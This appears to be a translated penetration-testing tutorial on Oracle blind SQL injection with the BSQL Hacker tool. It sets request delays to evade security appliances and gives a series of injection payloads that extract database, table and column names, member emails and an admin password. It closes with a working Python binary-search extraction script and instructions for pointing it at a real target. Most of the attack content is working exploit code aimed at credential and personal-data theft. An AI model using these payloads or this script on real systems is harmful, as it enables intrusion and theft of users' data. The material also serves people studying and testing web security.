
30./34. SQL Injection

[BSQL Hacker] Oracle Blind Injection

BSQL Hacker

Download URL : http://labs.portcullis.co.uk/tools/bsql-hacker/




Initial launch screen







Thread count setting (keep it low to avoid DoS detection or being blocked by security appliances)

Attack timing (Request Delay, in ms): 5000 ms = 5 seconds

One request every 5 seconds





Of the middle tabs (Dashboard, Detection, Request & Injection, Settings, Extracted Databases), check Detection

Blind Injection is decided by true/false responses, so set detection to Signature / Search Based
(the signature must be a string that appears in only one of the two responses, e.g. in the true page but never in the false page)






POST / GET method, Cookies and HTTP Headers can be configured

If the attack is performed after login, enter the Cookie value here





Can be configured when a web proxy is used

The request packet values are currently taken using Burp Suite




Select Templates > Templates - ORACLE - Blind SQL Injection





http://www.example.com/example.php?id=100 AND NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}--




Description      | Attack method
Target URL       | http://www.example.com/example.php
Parameter        | ?id=100
Operator         | AND
SQL query        | NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0) {OPERATION} {CHAR}
Comment          | --

{INJECTION} is the subquery whose result is read one character at a time; {POSITION} is the character index (1-based); {OPERATION} is the comparison operator and {CHAR} the ASCII code being tested. NVL(...,0) turns the NULL produced by SUBSTR past the end of the string into 0, which is how the end of the value is detected.





Subqueries to use for {INJECTION} can be found in the Oracle SQL Injection Cheat Sheet

http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet



################# Database #################

AND NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}--

AND NVL(ASCII(SUBSTR((SELECT global_name FROM global_name),{POSITION},1)),0){OPERATION}{CHAR}--


 

################# Tables #################

AND NVL(ASCII(SUBSTR((select Table_name from (select rownum rnum, Table_name from user_tables) where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --



################# Specific table #################

AND NVL(ASCII(SUBSTR((select Table_name from (select rownum rnum, Table_name from user_tables where table_name like '%MEMBER%') where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --

=> Extract tables whose name contains the string MEMBER (the rownum inline view is needed because Oracle has no LIMIT; increase rnum to walk the remaining rows)



################# Column extraction #################

AND NVL(ASCII(SUBSTR((select column_name from (select rownum rnum, column_name from user_tab_columns where table_name = 'MEMBER') where rnum=1),{POSITION},1)),0){OPERATION} {CHAR} --


################# Row count #################

AND NVL(ASCII(SUBSTR((select count(ID) from MEMBER),{POSITION},1)),0){OPERATION}{CHAR}--

=> count(ID) is a NUMBER; SUBSTR converts it to a string implicitly, so the digits come back one at a time


################# Data extraction #################

AND NVL(ASCII(SUBSTR((select MBR_ID||'|'||BIRTH_DT||'|'||HP_NO||'|'||MBR_NAME||'|'||MBR_EMAIL||'|'||MBR_PWD||'|'||MBR_PWD from (select rownum rnum, MBR_ID,BIRTH_DT,HP_NO,MBR_NAME,MBR_EMAIL,MBR_PWD,MBR_PWD from MEMBER) where rnum=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> Failed (the inline view selects MBR_PWD twice, so Oracle rejects the column as ambiguous and the condition errors out instead of returning true/false; list each column once, or alias the duplicate)


and NVL(ASCII(substr((select MBR_EMAIL from (select rownum as num, MBR_EMAIL from MEMBER) where num=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> Extract the 1st MBR_EMAIL from the MEMBER table

and NVL(ASCII(substr((select MBR_EMAIL from (select rownum as num, MBR_EMAIL from MEMBER where MBR_EMAIL like '%admin%') where num=1),{POSITION},1)),0){OPERATION}{CHAR}--
=> Extract the EMAIL containing the string admin from the MEMBER table



and NVL(ASCII(substr((select MBR_PWD from (select rownum as num, MBR_PWD from MEMBER where MBR_EMAIL like '%admin%') where num=1),{POSITION},1)),0){OPERATION}{CHAR}--

=> Extract the PASSWORD of that row
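The loop that BSQL Hacker runs behind the template above (fill {INJECTION}/{POSITION}/{OPERATION}/{CHAR}, send, classify the response as true or false, repeat) and the rownum paging used by the payloads, as an added Python example. This is not the tool's code and not from the original post; the target is replaced by a constructed in-memory stand-in (fake_target) with hypothetical GLOBAL_NAME and MEMBER contents so it runs offline, and the per-character binary search with {OPERATION}='>' is the generic blind-extraction approach rather than a claim about the tool's internals:

```python
import re
import time
from typing import Callable, List, Optional

# Template text copied from the BSQL Hacker "ORACLE - Blind SQL Injection" entry.
TEMPLATE = "AND NVL(ASCII(SUBSTR(({INJECTION}),{POSITION},1)),0){OPERATION}{CHAR}--"


def build_payload(injection: str, position: int, operation: str, char: int) -> str:
    """Fill the four placeholders; the result is appended to id=100 on the wire."""
    return (TEMPLATE.replace("{INJECTION}", injection)
                    .replace("{POSITION}", str(position))
                    .replace("{OPERATION}", operation)
                    .replace("{CHAR}", str(char)))


def row_subquery(column: str, table: str, n: int) -> str:
    """Oracle has no LIMIT, hence the rownum inline view used in the payloads above."""
    return (f"select {column} from (select rownum rnum, {column} from {table}) "
            f"where rnum={n}")


# ---- Constructed stand-in for the vulnerable page (hypothetical data) --------
# In a real run the True/False answer comes from classifying the HTTP response
# (Signature / Search Based); here a tiny in-memory "database" evaluates the
# injected condition the way Oracle would, so the example runs offline.
FAKE_DB = {
    "GLOBAL_NAME": {"GLOBAL_NAME": ["ORCL.EXAMPLE"]},
    "MEMBER": {"MBR_EMAIL": ["admin@example.com", "bob@example.com"]},
}
PAYLOAD_RE = re.compile(
    r"^AND NVL\(ASCII\(SUBSTR\(\((.+)\),(\d+),1\)\),0\)(<=|>=|<>|<|>|=)(\d+)--$")
ROW_RE = re.compile(
    r"^select (\w+) from \(select rownum rnum, \1 from (\w+)\) where rnum=(\d+)$",
    re.IGNORECASE)
PLAIN_RE = re.compile(r"^select (\w+) from (\w+)$", re.IGNORECASE)


def _resolve(injection: str) -> Optional[str]:
    """Evaluate the injected scalar subquery against FAKE_DB (None stands for NULL)."""
    m = ROW_RE.match(injection)
    if m:
        column, table, n = m.group(1).upper(), m.group(2).upper(), int(m.group(3))
        rows = FAKE_DB.get(table, {}).get(column, [])
        return rows[n - 1] if 1 <= n <= len(rows) else None
    m = PLAIN_RE.match(injection)
    if m:
        rows = FAKE_DB.get(m.group(2).upper(), {}).get(m.group(1).upper(), [])
        return rows[0] if rows else None
    return None


def fake_target(payload: str) -> bool:
    """Return the truth value Oracle would give the injected AND condition."""
    m = PAYLOAD_RE.match(payload)
    if not m:
        return False                        # unparsable: behaves like the "false" page
    value = _resolve(m.group(1))
    pos, op, char = int(m.group(2)), m.group(3), int(m.group(4))
    # NVL(ASCII(SUBSTR(v,pos,1)),0): past the end of v, or v NULL, SUBSTR is NULL -> 0
    code = ord(value[pos - 1]) if value is not None and pos <= len(value) else 0
    return {"<": code < char, ">": code > char, "=": code == char,
            "<=": code <= char, ">=": code >= char, "<>": code != char}[op]


def extract(injection: str, oracle: Callable[[str], bool],
            delay_ms: int = 0, max_len: int = 64) -> str:
    """Recover the subquery result one character at a time.

    Each character's ASCII code is found by binary search with {OPERATION}='>',
    so it costs exactly 8 requests; a code of 0 (NVL of a NULL SUBSTR) marks
    the end of the string.  delay_ms mirrors BSQL Hacker's Request Delay.
    """
    out = ""
    for position in range(1, max_len + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(build_payload(injection, position, ">", mid)):
                lo = mid + 1                # code > mid: answer is in (mid, hi]
            else:
                hi = mid                    # code <= mid: answer is in [lo, mid]
            time.sleep(delay_ms / 1000)     # the page uses 5000 ms = one request per 5 s
        if lo == 0:
            break
        out += chr(lo)
    return out


def extract_column(column: str, table: str, oracle: Callable[[str], bool],
                   delay_ms: int = 0) -> List[str]:
    """Walk rnum=1,2,... until the row subquery yields NULL (empty string)."""
    rows: List[str] = []
    n = 1
    while True:
        value = extract(row_subquery(column, table, n), oracle, delay_ms)
        if not value:
            break
        rows.append(value)
        n += 1
    return rows


if __name__ == "__main__":
    print(extract("SELECT global_name FROM global_name", fake_target))
    print(extract_column("MBR_EMAIL", "MEMBER", fake_target))
```

Against a real target, replace fake_target with a function that sends `id=100 <payload>` through the configured method, cookies and proxy and returns whether the true-page signature is present; with the page's 5000 ms delay each character costs about 40 seconds, which is the price of staying under the rate-based blocking the Thread and Request Delay settings are there to avoid.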